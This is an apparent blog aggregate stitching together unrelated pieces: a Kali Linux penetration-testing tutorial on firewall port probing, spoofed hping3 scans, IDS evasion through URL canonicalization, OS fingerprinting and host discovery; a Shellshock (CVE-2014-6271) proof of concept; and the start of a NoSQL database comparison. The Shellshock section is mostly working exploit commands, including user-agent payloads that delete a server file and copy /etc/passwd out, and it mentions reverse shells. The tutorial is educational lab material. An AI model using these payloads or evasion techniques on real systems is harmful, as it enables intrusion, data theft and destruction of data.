1. Click on the add a new rule button displayed in the preceding screenshot.
2. Use the following rule settings to enable ICMP pass-through:

  • Action: Pass 
  • Interface: WAN
  • Protocol: ICMP
  • All others: Defaults

3. Click on the Save button at the bottom of the screen.
4. Click on the Apply Changes button at the top of the screen.
5. Use the Interface | WAN navigation menu to enter the WAN interface configuration menu and uncheck Block private networks. Apply the changes and return to Firewall | Rules.





6. Click on the add new rule button.

7. Use the following rule settings to enable HTTP pass-through.

  • Action: Pass 
  • Interface: WAN
  • Protocol: TCP
  • Destination port range: HTTP

8. Continue adding ports until the configuration matches the following:


At this point any machine connected to VLAN1 can communicate through the open ports, as well as ping machines on the VLAN2 segment, as can be seen in the following screenshot:



Finding out if the firewall is blocking certain ports:-

There is a firewall; now what? The next step is to determine which ports are being blocked by the firewall, or more importantly which are open.

Hping:-

 Hping2 and Hping3 are included as part of the Kali Linux distribution. Hping3 can be accessed via the GUI navigation bar: Applications | Kali Linux | Information Gathering | Live Host Identification | Hping3. It can also be invoked at the command line by simply typing hping3. Hping3 is a powerful tool that can be used for various security testing tasks. The following syntax can be used to find open ports while remaining fully in control of your scan:
# hping3 -S 192.168.20.11 -c 80 -p ++1


 This command allowed us to perform a SYN scan starting at port 1 and incrementing for 80 steps.

Depending on the firewall configuration it may also be possible to send spoofed packets. During a test it is beneficial to ensure that the configuration does not allow for this behavior to occur. Hping is perfectly suited for this task. The following is an example of how you may test if the firewall allows this traffic to pass:
#hping3 -c 10 -S --spoof 192.168.20.11 -p 80 192.168.20.100

This command will spoof 10 packets from 192.168.20.11 to port 80 on 192.168.20.100. This is the basis for an idle scan and if successful would allow you to hping the 192.168.20.11 machine to look for an increase in the IP sequence number. In this case we could enable monitoring on the pfSense machine to emulate what this traffic looks like to a network administrator reviewing the logs.
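
To emulate the monitoring half of that idle scan, hping3 can print the IP ID field relative to the previous reply; a sketch against the example host above:

#hping3 -S -r -p 80 192.168.20.11

With -r, a steady +1 increment suggests an idle host; larger jumps mean it is generating traffic of its own, which is exactly the signal an idle scan reads.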


Challenge yourself to create and monitor different packets and uses of Hping so that you can gain a good understanding of the traffic flow. The best means of remaining undetected while testing is to fully understand the technology that is being used. Take a look at the logs generated from a successful scan and keep in mind that due to the amount of traffic involved even secured networks will sometimes only log and trigger events based on denied traffic.


 Note:-Logging per rule will need to be enabled on the firewall to see allowed traffic. Not logging permitted traffic is fairly standard practice as it reduces the firewall log size. Educate your clients that proactively monitoring allowed traffic can also be beneficial when attempting to truly secure a network.

Nmap firewalk script:-

One of the easiest methods to test open ports on a firewall is to simply use the firewalking script for Nmap. To test the open firewall ports you will need a host behind the firewall as the target:
#nmap –script=firewalk –traceroute 192.168.20.11


The command sequence is straightforward and familiar: we invoke nmap, use the script option, and choose the firewalk script. We then provide the input that firewalk needs by performing a traceroute to 192.168.20.11 which we know is behind our target firewall. 


 Although we were able to determine which ports on the firewall were open (21, 80, and 443), if you take a look at the firewall denies it quickly becomes apparent that this is not a quiet test and should only be used when stealth is not needed. What this boils down to is that stealth requires patience and a well-made plan of action. It may be easier to manually verify if there are any common ports open on the firewall and then try to scan using one of the well-known ports.




Avoiding IDS:-

In a secured environment you can count on running into IDS and IPS. Properly configured, and used as part of a true defense-in-depth model, their effectiveness increases tremendously. This means that the IDS will need to be properly updated, monitored, and used in the proper locations. A penetration tester will be expected to verify that the IDSs are working properly in conjunction with all other security controls to properly protect the environment.

The primary method of bypassing any IDS is to avoid signatures that are created to look for specific patterns. These signatures must be fine-tuned to find only positively malicious behavior and should not be so restrictive that alerts are triggered for normal traffic patterns. Over the years, the maturity level of these signatures has increased significantly, but a penetration tester or knowledgeable attacker will be able to use various means to bypass even the most carefully crafted signatures. In this section, we review some of the methods that have been used by attackers in the wild.



Canonicalization Technique:-

Canonicalization refers to the act of substituting various inputs for the canonical name of a file or path. This practice can be as simple as substituting hexadecimal representations for ASCII text values. Here is an example of an equivalent string:

• String A in Hex: “54:68:69:73:20:69:73:20:61:20:73:74:72:69:6e:67”
• String A in text: “This is a string”
• String A in ASCII: “084 104 105 115 032 105 115 032 097 032 115 116 114 105 110 103” 
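
You can reproduce the hexadecimal form with standard shell tools; a quick sketch:

$ echo -n "This is a string" | xxd -p | sed 's/../&:/g; s/:$//'
54:68:69:73:20:69:73:20:61:20:73:74:72:69:6e:67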


Attackers take advantage of the fact that there are sometimes literally thousands of possible combinations for a single URL. To put this into perspective, let's take a look at the address we can use to get from our browser to our local Apache server:
#http://3232240651/
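
The decimal form is simply the four octets of the IP address packed into one 32-bit integer; 3232240651 decodes to 192.168.20.11. The arithmetic can be checked in the shell:

$ echo $(( (192 << 24) + (168 << 16) + (20 << 8) + 11 ))
3232240651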

Luckily, this address confuses our Apache server and we receive the following message:


 The previous request attempted to load the local page at 127.0.0.1. Let’s see what occurs when we try to load the remote pfSense administration console in the same manner:
#http://2130706433/

Here we are warned by the web server hosting the pfSense administrative console that a potential DNS Rebind attack occurred:


 Let’s try something else that actually works properly:

In the console, ping one of the addresses we listed above:

 #ping 3232240651



As we can see, the IP address resolved properly and we receive our replies as expected. This very same concept is key when trying to bypass an IDS rule. If the type of IDS can be determined, then it should be possible to get the signatures. When reviewing these signatures, you would look for opportunities to obscure the URLs, filenames, or other path information enough to bypass the existing ruleset.


August 26, 2014

Hacking – Operating System Fingerprinting using Different Tools & Techniques


After we know that the target machine is alive, we can find out the operating system it uses. This method is commonly known as Operating System (OS) fingerprinting.
There are two methods of doing OS fingerprinting:

  • active
  • passive

In the active method, the tool sends network packets to the target machine and then determines the operating system of the target machine based on the analysis done on the response it has received. The advantage of this method is that the fingerprinting process is fast. However, the disadvantage is that the target machine may notice our attempt to get its operating system’s information.

To overcome the active method's disadvantage, there exists a passive method of OS fingerprinting. This method was pioneered by Michal Zalewski when he released the p0f tool. The disadvantage of the passive method is that the process is slower than the active method.

In this section, we will describe a couple of tools that can be used for OS fingerprinting.

p0f:-

The p0f tool is used to fingerprint an operating system passively. It can be used to identify the operating system on the following machines:

  • Machines that connect to your box (SYN mode; this is the default mode)
  • Machines you connect to (SYN+ACK mode)
  • Machines you cannot connect to (RST+ mode)
  • Machines whose communications you can observe


The p0f tool works by analyzing the TCP packets sent during network activity. It then gathers statistics from special packet fields whose default values are not standardized across operating systems.



An example is that the Linux kernel uses a 64-byte ping datagram, whereas the Windows operating system uses a 32-byte ping datagram; another is the Time To Live (TTL) value. For Windows, the TTL value is 128, while for Linux the TTL value varies between distributions. This information is then used by p0f to determine the remote machine's operating system.
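
You can observe the TTL yourself in any ping reply; illustrative output, with timings that will of course vary:

$ ping -c 1 192.168.198.131
64 bytes from 192.168.198.131: icmp_seq=1 ttl=64 time=0.48 ms

A ttl of 64 here is consistent with a Linux target, assuming no intermediate routers have decremented it.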


To use the new version of p0f, download it from http://lcamtuf.coredump.cx/p0f3/releases/p0f-3.07b.tgz, then extract the archive. Now let's use p0f to identify the operating system used on a remote machine we are connecting to. Just type the following command in your console:
#p0f -f p0f.fp -o log.log

This will read the fingerprint database from the /root/p0f-3.07b/p0f.fp file and save the log information to the log.log file. It will then display the following information:



Next, you need to generate network activity involving a TCP connection, such as browsing to the remote machine or letting the remote machine connect to yours.
I use Netcat in another terminal to do that:
#nc 192.168.198.131 80

If p0f has successfully fingerprinted the operating system, you will see information about the remote machine's operating system in the console and in the log file.



Based on the preceding result, we know that the target is a Linux 2.6.x machine.

The following screenshot shows the information from the target machine:


By comparing this information, we know that p0f got the OS information correctly: the remote machine is using Linux version 2.6. You can stop p0f by pressing the Ctrl + C key combination.

Nmap:-

Nmap is a very popular and capable port scanner. Besides this, it can also be used to fingerprint a remote machine’s operating system. It is an active fingerprinting tool. To use this feature, you can give the -O option to the nmap command.



For example, if we want to fingerprint the operating system used on the 192.168.198.131 machine, we use the following command:
#nmap -O 192.168.198.131




Nmap was able to get the correct operating system information after fingerprinting the operating system of a remote machine.

August 19, 2014

Identifying the Target Machine using Different Tools & Techniques


The tools included in this category are used to identify the target machines that a penetration tester can access. Before we start the identification process, we need to know our client's terms and agreements. If they require us to hide our pen-testing activities, we must conceal them; stealth techniques may also be applied for testing the Intrusion Detection System (IDS) or Intrusion Prevention System (IPS) functionality. If there are no such requirements, we may not need to conceal our penetration testing activities.


ping:-

 The ping tool is the most famous tool that is used to check whether a particular host is available. The ping tool works by sending an Internet Control Message Protocol (ICMP) echo request packet to the target host. If the target host is available and the firewall is not blocking the ICMP echo request packet, it will reply with the ICMP echo reply packet.



Note:-The ICMP echo request and ICMP echo reply are two of the available ICMP control messages.

Although you can’t find ping in the Kali Linux menu, you can open the console and type the ping command with its options.

To use ping, you can just type ping and the destination address as shown in the following screenshot:
#ping 192.168.126.130
 


In Kali Linux, by default, ping will run continuously until you press Ctrl + C.

The ping tool has a lot of options, but the following are a few options that are often used:

• The -c count option: this is the number of echo request packets to be sent.
• The -I interface address option: this is the network interface of the source address. The argument may be a numeric IP address (such as 192.168.56.102) or the name of the device (such as eth0). This option is required if you want to ping the IPv6 link-local address.
• The -s packet size option: this specifies the number of data bytes to be sent. The default is 56 bytes, which translates into 64 ICMP data bytes when combined with the 8 bytes of the ICMP header data.
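
For example, combining these options (the interface name here is just an illustration; use whatever your machine has):

#ping -c 2 -s 120 -I eth0 192.168.126.130

This sends two echo requests of 120 data bytes each out of the eth0 interface.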

Let’s use the preceding information in practice.

Suppose you are starting with internal penetration testing work. The customer gave you access to their network using a LAN cable, and they also gave you the list of target servers' IP addresses.
 
The first thing you would want to do before launching a full penetration testing arsenal is to check whether these servers are accessible from your machine. You can use ping for this task.
 
The target server is located at 192.168.126.130, while your machine has an IP address of 192.168.126.129. To check the target server availability, you can give the following command:
#ping -c 1 192.168.126.130
The following screenshot is the result of the preceding ping command:
Note:-ping also accepts hostnames as the destination.
From the preceding screenshot, we know that there is one ICMP echo request packet sent to the destination (IP address: 192.168.126.130). Also, the sending host (IP address: 192.168.126.129) received one ICMP echo reply packet. The round-trip time required is 1.326 ms, and there is no packet loss during the process.
Let’s see the network packets that are transmitted and received by our machine. We are going to use Wireshark, a network protocol analyzer, on our machine to capture these packets, as shown in the following screenshot:
From the preceding screenshot, we can see that our host (192.168.126.129) sent one ICMP echo request packet to the destination host (192.168.126.130). Since the destination is alive and allows the ICMP echo request packet, it will send the ICMP echo reply packet back to our machine.
If your target is using an IPv6 address, such as fe80::20c:29ff:fee1:96df, you can use the ping6 tool to check its availability. You need to give the -I option for the command to work against the link-local address:
The following screenshot shows the packets sent to complete the ping6 request:
From the preceding screenshot, we know that ping6 is using the ICMPv6 request and reply.
Security Tip:-To block the ping request, the firewall can be configured to only allow the ICMP echo request packet from a specific host and drop the packets sent from other hosts.
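
That tip translates to two iptables rules; a minimal sketch, where the trusted host address is an assumption:

# iptables -A INPUT -p icmp --icmp-type echo-request -s 192.168.126.129 -j ACCEPT
# iptables -A INPUT -p icmp --icmp-type echo-request -j DROP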

arping:-

The arping tool is used to ping a host in the Local Area Network (LAN) using the Address Resolution Protocol (ARP) request. You can use arping to ping a target machine using its IP, host, or Media Access Control (MAC) address.
The arping tool operates on Open System Interconnection (OSI) layer 2 (the data link layer), and it can only be used in a local network. Moreover, ARP cannot be routed across routers or gateways.

To start arping, you can use the console to execute the following command:
# arping

This will display brief usage information on arping.
You can use arping to get the target host’s MAC address:
# arping 192.168.126.130 -c 1
From the previous command output, we can see that the target machine has a MAC address of 00:0c:29:e1:96:df.
Let’s observe the network packets captured by Wireshark on our machine during the arping process:
From the preceding screenshot, we can see that our network card (MAC address: Vmware_46:15:dc) sends an ARP request to the broadcast MAC address (ff:ff:ff:ff:ff:ff), looking for the IP address 192.168.126.130. Since that IP address is in use, its owner sends back an ARP reply stating its MAC address (Vmware_e1:96:df), as can be seen from packet number 2.
However, if the IP address is not in use, no machine will send an ARP reply, and 192.168.126.129 receives no answer, as can be seen from the following screenshot:
Another common use of arping is to detect duplicate IP addresses in a local network. For example, your machine is usually connected to a local network using an IP address of 192.168.126.40; one day, you would like to change the IP address. Before you can use the new IP address, you need to check whether that particular IP address has already been used.
You can use the following arping command to help you detect whether the IP address of 192.168.126.140 has been used:
# arping -d -i eth0 192.168.126.140 -c 2
# echo $?
If the code returns 0, it means that the IP address is available, whereas if the code returns 1, it means that the IP address 192.168.126.140 is already in use by another machine.



fping:-

The difference between ping and fping is that the fping tool can be used to send a ping (ICMP echo) request to several hosts at once. You can specify several targets on the command line, or you can use a file containing the hosts to be pinged.

In the default mode, fping works by monitoring the reply from the target host. If the target host sends a reply, it will be noted and removed from the target list. If the host doesn’t respond for a certain time limit, it will be marked as unreachable.

By default, fping will try to send three ICMP echo request packets to each target.

To access fping, you can use the console to execute the following command:
# fping -h

This will display the description of usage and options available in fping.

The following scenarios will give you an idea of the fping usage:

If we want to know the alive hosts of 192.168.126.129, 192.168.126.130 and 192.168.126.2 at once, we can use the following command:
#fping 192.168.126.129 192.168.126.130 192.168.126.2

The following is the result of the preceding command:


We can also generate the host list automatically, without defining the IP addresses one by one, and identify the alive hosts. Let’s suppose we want to know the alive hosts in the 192.168.126.0 network; we can use the -g option and define the network to check, using the following command:
# fping -g 192.168.126.0/24

The result for the preceding command is as follows:


If we want to change the number of ping attempts made to the target, we can use the -r option (retry limit) as shown in the following command line. By default, the number of ping attempts is three.
#fping -r 1 -g 192.168.126.130 192.168.126.2

The result of the command is as follows:


Displaying the cumulative statistics can be done by giving the -s option (print cumulative statistics) as follows:
#fping -s www.yahoo.com www.google.com www.msn.com

The following is the result of the preceding command line:


hping3:-

The hping3 tool is a command-line network packet generator and analyzer tool. The capability to create custom network packets allows hping3 to be used for TCP/IP and security testing, such as port scanning, firewall rule testing, and network performance testing.



Besides that, hping3 can also be used to do the following:

• Test firewall rules
• Test the Intrusion Detection System (IDS)
• Exploit known vulnerabilities in the TCP/IP stack


To access hping3, go to the console and type hping3. You can give commands to hping3 in several ways, via the command line, interactive shell, or script.

Without any given command-line options, hping3 will send a null TCP packet to port 0.

In order to change to a different protocol, you can use the following options in the command line to define the protocol:
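• -0 or --rawip: RAW IP mode
• -1 or --icmp: ICMP mode
• -2 or --udp: UDP mode
• -8 or --scan: Scan mode
• -9 or --listen: Listen mode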

When using the TCP protocol, we can use the TCP packet without any flags (this is the default behavior) or we can give one of the following flag options:
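• -F or --fin: Set the FIN flag
• -S or --syn: Set the SYN flag
• -R or --rst: Set the RST flag
• -P or --push: Set the PUSH flag
• -A or --ack: Set the ACK flag
• -U or --urg: Set the URG flag
• -X or --xmas: Set the X unused flag (0x40)
• -Y or --ymas: Set the Y unused flag (0x80)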


 Let’s use hping3 for several cases as follows:

Send one ICMP echo request packet to a 192.168.126.130 machine. The options used are -1 (for the ICMP protocol) and -c 1 (to set the count to one packet):
#hping3 -1 192.168.126.130 -c 1

The following is the output of the command:



From the preceding output, we can note that the target machine is alive because it has replied to our ICMP echo request. To verify this, we captured the traffic using tcpdump and the following screenshot shows the packets:

We can see that the target has responded with an ICMP echo reply packet.

Besides giving the options in the command line, you can also use hping3 interactively. Open the console and type hping3. You will then see a prompt where you can type your Tcl commands.

For the preceding example, the following is the corresponding Tcl script:
hping send {ip(daddr=192.168.126.130)+icmp(type=8,code=0)}

Open a command-line window and give the following command to get a response from the target server:
#hping recv eth0

After that, open another command-line window to input the sending request.

The following screenshot shows the response received:


• You can also use hping3 to check for a firewall rule. Let’s suppose you have the following firewall rules:
                  ° Accept any TCP packets directed to port 22 (SSH)
                  ° Accept any TCP packets related with an established connection
                  ° Drop any other packets

To check these rules, you can give the following command in hping3 in order to send an ICMP echo request packet:
#hping3 -1 192.168.126.130 -c 1

The following code is the result:


We can see that the target machine has not responded to our ping probe; the firewall drops the ICMP echo request packet, as expected from the third rule.
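To also exercise the first rule, a TCP SYN probe to port 22 can be sent (a sketch; -S sets the SYN flag and -p selects the destination port). A reply with the SA flags set would show that the port accepts connections:

#hping3 -S 192.168.126.130 -p 22 -c 1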

nping:-

The nping tool allows users to generate network packets for a wide range of protocols (TCP, UDP, ICMP, and ARP). You can also customize the fields in the protocol headers, such as the source and destination ports for TCP and UDP. The difference between nping and other similar tools, such as ping, is that nping supports multiple target hosts and port specifications.

It can be used to send an ICMP echo request just as the ping command does. nping can also be used for network stress testing, Address Resolution Protocol (ARP) poisoning, and denial-of-service attacks.

In Kali Linux, nping is included with the Nmap package. The following are several probe modes supported by nping (as listed in its usage output):
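• --tcp-connect: Unprivileged TCP connect probe
• --tcp: TCP probe
• --udp: UDP probe
• --icmp: ICMP probe (the default mode for privileged users)
• --arp: ARP/RARP probe
• --tr or --traceroute: Traceroute mode (usable with TCP, UDP, or ICMP)
• --echo-client and --echo-server: Nping’s echo mode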


You need to open a console and type nping. This will display the usage and options’ description.
In order to use nping to send an ICMP echo request to the target machines 192.168.198.129, 192.168.198.130, and 192.168.198.131, you can give the following command:

#nping -c 1 192.168.198.129-131
The following screenshot shows the command output:

From the preceding screenshot, we know that only the 192.168.198.131 machine is sending back the ICMP echo reply packet.
If the machine is not responding to the ICMP echo request packet, you can still find out whether it is alive by sending a TCP SYN packet to an open port on that machine. For example, to send one (-c 1) TCP packet (--tcp) to port 22 (-p 22) of the IP address 192.168.198.131, you can give the following command:

#nping --tcp -c 1 -p 22 192.168.198.131

Of course, you need to guess the ports which are open. We suggest that you try with the common ports, such as 21, 22, 23, 25, 80, 443, 8080, and 8443.

The following screenshot shows the result of the mentioned example:

From the preceding result, we can see that the remote machine (192.168.198.131) is alive because when we sent the TCP packet to port 22, the target machine responded.

alive6:-

If you want to discover which machines are alive in an IPv6 environment, you can’t just ask the tool to scan the whole network, because the address space is huge. You may find that the machines sit in a 64-bit network range; trying to discover them sequentially would require at least 2^64 packets, which is clearly not feasible in the real world.
Fortunately, there is a protocol called ICMPv6 Neighbor Discovery. This protocol allows an IPv6 host to discover the link-local and autoconfigured addresses of all other IPv6 systems on the local network. In short, you can use this protocol to find a live host on the local network subnet.
To help you do this, there is a tool called alive6, which can send an ICMPv6 probe and is able to listen to the responses. This tool is part of the THC-IPv6 Attack Toolkit developed by van Hauser from The Hackers Choice group.
Suppose you want to find the active IPv6 systems on your local IPv6 network; the following command can be given, assuming that the eth0 interface is connected to the LAN:

#alive6 -p eth0

detect-new-ip6:-

This tool can be used if you want to detect the new IPv6 address joining a local network. This tool is part of the THC-IPv6 Attack Toolkit developed by van Hauser from The Hackers Choice group.
To access detect-new-ip6, go to the console and type detect-new-ip6. This will display the usage information.
Following is a simple usage of this tool; we want to find the new IPv6 address that joined the local network:

#detect-new-ip6 eth0

passive_discovery6:-

This tool can be used if you want to sniff out the local network to look for the IPv6 address. This tool is part of the THC-IPv6 Attack Toolkit developed by van Hauser from The Hackers Choice group. Getting the IPv6 address without being detected by an IDS can be useful.

To access passive_discovery6, go to the console and type passive_discovery6. This will display the usage information on the screen. The following command is an example of running this tool:
#passive_discovery6 eth0
This tool simply waits for neighbor discovery messages (the ICMPv6 counterparts of ARP requests/replies) by monitoring the network, and then it maps the answering hosts. The following are the IPv6 addresses that were discovered by this tool on the network:

• fe80::539:3035:77a4:dc68

• fe80::20c:29ff:fee1:96df

nbtscan:-

If you are doing internal penetration testing on a Windows environment, the first thing you want to do is get the NetBIOS information. One of the tools that can be used to do this is nbtscan.
The nbtscan tool will produce a report that contains the IP address, NetBIOS computer name, services available, logged-in username, and MAC address of the corresponding machines. The NetBIOS name is useful if you want to access a service provided by the machine over the NetBIOS protocol, such as an open file share. Be careful: using this tool generates a lot of traffic, and it may be logged by the target machines.

To access nbtscan, you can open the console and type nbtscan. As an example, I want to find out the NetBIOS name of the computers located in my network (192.168.198.0/24). The following is the command to be used:

#nbtscan 192.168.198.1-254



From the preceding result, we are able to find the NetBIOS name METASPLOITABLE.

Let’s find the service provided by these machines by giving the following command:

#nbtscan -hv 192.168.198.1-254

The -h option prints the services with human-readable names, while the -v option gives more verbose output.


From the preceding result, we can see that there are many services available on METASPLOITABLE: Workstation, Messenger, File Server, and so on. In our experience, this information is very useful because it tells us which machines offer a file sharing service. Next, we can check whether those file shares are open so that we can access the files stored on them.
URL: http://kungfuhacking.blogspot.in

CVE-2014-6271

 Security  Comments Off on CVE-2014-6271
Sep 252014
 
A fun Bash bug: it doesn’t stop interpreting a variable at the end of a function definition, and is, therefore, susceptible to arbitrary command execution. If you’re using CGIs, this becomes RCE.
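You can check whether a given bash build is affected with the by-now-classic one-liner; a vulnerable shell prints “vulnerable” before “test”, while a patched one prints only “test”:

$ env x='() { :;}; echo vulnerable' bash -c "echo test"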
For this example, I’ve chosen to abuse the user-agent setting:
$ curl http://192.168.0.1/target
 
PoC||GTFO
Great, we get a page. Now lets go looking for a CGI script… and as it happens, we’ve found one, poc.cgi:
#!/bin/bash

echo "Content-type: text/html"
echo ""

echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'

exit 0
Requesting this CGI gives a nice picture of the environment:
$ curl http://192.168.0.1/poc.cgi
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>PoC</title>
</head>
<body>
<pre>
SERVER_SIGNATURE=<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
 
HTTP_USER_AGENT=curl/7.26.0
SERVER_PORT=80
HTTP_HOST=192.168.0.1
DOCUMENT_ROOT=/var/www
SCRIPT_FILENAME=/var/www/poc.cgi
REQUEST_URI=/poc.cgi
SCRIPT_NAME=/poc.cgi
REMOTE_PORT=40974
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
SERVER_ADMIN=webmaster@localhost
HTTP_ACCEPT=*/*
REMOTE_ADDR=192.168.0.1
SHLVL=1
SERVER_NAME=192.168.0.1
SERVER_SOFTWARE=Apache/2.2.22 (Debian)
QUERY_STRING=
SERVER_ADDR=192.168.0.1
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
_=/usr/bin/env
</pre>
</body>
</html>
Now, using the Bash bug, and the handy flag for setting the user-agent with curl, we do the following evil thing:
$ curl -A "() { :; }; /bin/rm /var/www/target" http://192.168.0.1/poc.cgi
 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
Notice that I’ve used a path that is owned by the webserver to avoid permission issues. Also, in quick testing, anything that wrote to STDOUT caused header errors. I even tried sending the content type in the user-agent definition. Back to checking on the damage that we have done:
$ curl http://192.168.0.1/target
 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /target was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
So there it is, RCE for a Bash CGI script.

Update 1:

Getting around the STDOUT issue wrecking headers is easier than I thought; cat the file and redirect the output, then fetch the file:

$ curl -A '() { :; }; /bin/cat /etc/passwd > dumped_file' http://192.168.0.1/poc.cgi
 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
and the fetch:

$ curl http://192.168.0.1/dumped_file
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

 Update 2:

Seeing some slick reverse shells now on pastebin. This is going to be nasty, especially on embedded systems that aren’t using busybox.

Update 3:

Talked with @loganattwood OOB about timing attacks against DHCP lease expiry & passing shellcode via DHCP options. Nice privilege escalation scenario.

Cassandra vs MongoDB vs CouchDB vs Redis vs Riak vs HBase vs Couchbase vs OrientDB vs Aerospike vs Neo4j vs Hypertable vs ElasticSearch vs Accumulo vs VoltDB vs Scalaris comparison

 Database  Comments Off on Cassandra vs MongoDB vs CouchDB vs Redis vs Riak vs HBase vs Couchbase vs OrientDB vs Aerospike vs Neo4j vs Hypertable vs ElasticSearch vs Accumulo vs VoltDB vs Scalaris comparison
Sep 242014
 

(Yes it’s a long title, since people kept asking me to write about this and that too 🙂 I do when it has a point.)
While SQL databases are insanely useful tools, their monopoly in the last decades is coming to an end. And it’s just time: I can’t even count the things that were forced into relational databases, but never really fitted them. (That being said, relational databases will always be the best for the stuff that has relations.)
But, the differences between NoSQL databases are much bigger than there ever were between one SQL database and another. This means that it is a bigger responsibility on software architects to choose the appropriate one for a project right at the beginning.
In this light, here is a comparison of Cassandra, Mongodb, CouchDB, Redis, Riak, Couchbase (ex-Membase), Hypertable, ElasticSearch, Accumulo, VoltDB, Kyoto Tycoon, Scalaris, OrientDB, Aerospike, Neo4j and HBase:

The most popular ones

Redis (V2.8)

  • Written in: C
  • Main point: Blazing fast
  • License: BSD
  • Protocol: Telnet-like, binary safe
  • Disk-backed in-memory database,
  • Dataset size limited to computer RAM (but can span multiple machines’ RAM with clustering)
  • Master-slave replication, automatic failover
  • Simple values or data structures by keys
  • but complex operations like ZREVRANGEBYSCORE.
  • INCR & co (good for rate limiting or statistics)
  • Bit operations (for example to implement bloom filters)
  • Has sets (also union/diff/inter)
  • Has lists (also a queue; blocking pop)
  • Has hashes (objects of multiple fields)
  • Sorted sets (high score table, good for range queries)
  • Lua scripting capabilities (!)
  • Has transactions (!)
  • Values can be set to expire (as in a cache)
  • Pub/Sub lets one implement messaging

Best used: For rapidly changing data with a foreseeable database size (should fit mostly in memory).
For example: To store real-time stock prices. Real-time analytics. Leaderboards. Real-time communication. And wherever you used memcached before.
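As a quick sketch of the INCR-style rate limiting mentioned above (the key name and 60-second window are made up):

$ redis-cli INCR ratelimit:client42
$ redis-cli EXPIRE ratelimit:client42 60
$ redis-cli GET ratelimit:client42

If the counter exceeds your per-minute limit, reject the request; the key expires on its own once the window passes.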

Cassandra (2.0)

  • Written in: Java
  • Main point: Store huge datasets in “almost” SQL
  • License: Apache
  • Protocol: CQL3 & Thrift
  • CQL3 is very similar to SQL, but with some limitations that come from the scalability (most notably: no JOINs, no aggregate functions.)
  • CQL3 is now the official interface. Don’t look at Thrift, unless you’re working on a legacy app. This way, you can live without understanding ColumnFamilies, SuperColumns, etc.
  • Querying by key, or key range (secondary indices are also available)
  • Tunable trade-offs for distribution and replication (N, R, W)
  • Data can have expiration (set on INSERT).
  • Writes can be much faster than reads (when reads are disk-bound)
  • Map/reduce possible with Apache Hadoop
  • All nodes are similar, as opposed to Hadoop/HBase
  • Very good and reliable cross-datacenter replication
  • Distributed counter datatype.
  • You can write triggers in Java.

Best used: When you need to store data so huge that it doesn’t fit on server, but still want a friendly familiar interface to it.
For example: Web analytics, to count hits by hour, by browser, by IP, etc. Transaction logging. Data collection from huge sensor arrays.
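For instance, setting the per-row expiration mentioned above happens at INSERT time; a CQL3 sketch with invented table and column names:

INSERT INTO hits_by_hour (browser, hour, hits)
VALUES ('firefox', '2014-09-24 10:00:00', 1)
USING TTL 86400;

The row silently disappears 86400 seconds (one day) after the write.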

MongoDB (2.2)

  • Written in: C++
  • Main point: Retains some friendly properties of SQL. (Query, index)
  • License: AGPL (Drivers: Apache)
  • Protocol: Custom, binary (BSON)
  • Master/slave replication (auto failover with replica sets)
  • Sharding built-in
  • Queries are javascript expressions
  • Run arbitrary javascript functions server-side
  • Better update-in-place than CouchDB
  • Uses memory mapped files for data storage
  • Performance over features
  • Journaling (with –journal) is best turned on
  • On 32bit systems, limited to ~2.5Gb
  • An empty database takes up 192Mb
  • GridFS to store big data + metadata (not actually an FS)
  • Has geospatial indexing
  • Data center aware

Best used: If you need dynamic queries. If you prefer to define indexes, not map/reduce functions. If you need good performance on a big DB. If you wanted CouchDB, but your data changes too much, filling up disks.
For example: For most things that you would do with MySQL or PostgreSQL, but having predefined columns really holds you back.
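A dynamic-query sketch in the mongo shell (collection and field names are invented):

db.users.ensureIndex({ age: 1 })
db.users.find({ age: { $gt: 30 } }).sort({ signup: -1 }).limit(10)

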